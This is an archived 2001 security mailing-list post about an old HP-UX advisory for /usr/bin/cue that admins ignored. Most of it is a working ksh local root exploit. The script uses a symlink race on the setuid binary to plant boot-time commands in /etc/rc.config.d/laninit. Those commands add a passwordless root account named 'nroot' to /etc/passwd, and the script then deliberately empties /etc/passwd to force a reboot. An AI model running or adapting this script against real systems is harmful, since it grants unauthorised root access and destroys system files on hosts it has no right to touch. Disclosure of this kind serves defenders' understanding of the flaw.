Hi there, One of the major problems I see with admins/security nowadays is that admin don't secure their host : they install patches ...which is slightly different. It reminds me of this (very) old advisory which was issued by HP in 1997 (!!!) about /usr/bin/cue : In the "Workarounds/Solution" section, the advice was to : # chmod 400 /usr/bin/cue or # chgrp trusted /usr/bin/cue # chmod 4750 /usr/bin/cue ...but admins just don't read advisories. They patch... ...and there was no patch for cue. This explains why most of big HPUX servers are still vulnerable. I don't know the reason why, but I think I've never seen any exploit for this one. Let's remember the "Scriptors of Doom" days ! Local root exploit below. Emilie Chang. ---------- #!/usr/bin/ksh ## ## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./! ## ## This is just a proof of concept. Don't use for malicious ## purpose. If ever you decide to run that script, please ## read the code carefully before! ## ## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT ## people. Good job sweethearts. ## ## Old-styled exploit, tested on HPUX 10.20, model 899 ## Warning : /usr/bin/cue exists on HPUX 800 models only ## ## Let's test the model by the way... ## MODEL=`/usr/bin/model | awk -F '/' '{print $2}'` export MODEL if [ $MODEL -lt 800 -o $MODEL -gt 899 ] then echo "Your host doesn't look like a HPuX 8** model, stopping now." exit fi ## ## Test whether /usr/bin/cue exists or not... ## if [ ! -u /usr/bin/cue ] then echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now." exit fi ## ## Well you passed the above tests. Going on playing. ## Creating a file within /etc/rc.config.d : It will ## be executed at next reboot (which might happen ## soon) ## TTY=`tty | awk -F '/' '{print $3}'` export TTY TERM=whatevah export TERM umask 000 ln -s /etc/rc.config.d/laninit IDMERROR.$TTY /usr/bin/cue > /dev/null 2> /dev/null ## ## Inserting evil root account within /etc/passwd ## echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit ## ## Now saving the passwd file, which we are about to empty ## cp /etc/passwd /tmp/passwd ## ## passwd file destruction ## (SOMEONE SET US UP THE BOMB !!) ## rm IDMERROR.$TTY ln -s /etc/passwd IDMERROR.$TTY /usr/bin/cue > /dev/null 2> /dev/null ## ## *POOF*, now that the /etc/passwd file is emptied, admin ## MUST reboot to get things done. ## echo "Your nroot account will be created within /etc/passwd" echo "with no password. Remove it asap, it's just a proof" echo "of concept!" # The end.
This archive was generated by hypermail 2b30 : Fri Jun 08 2001 - 12:51:57 PDT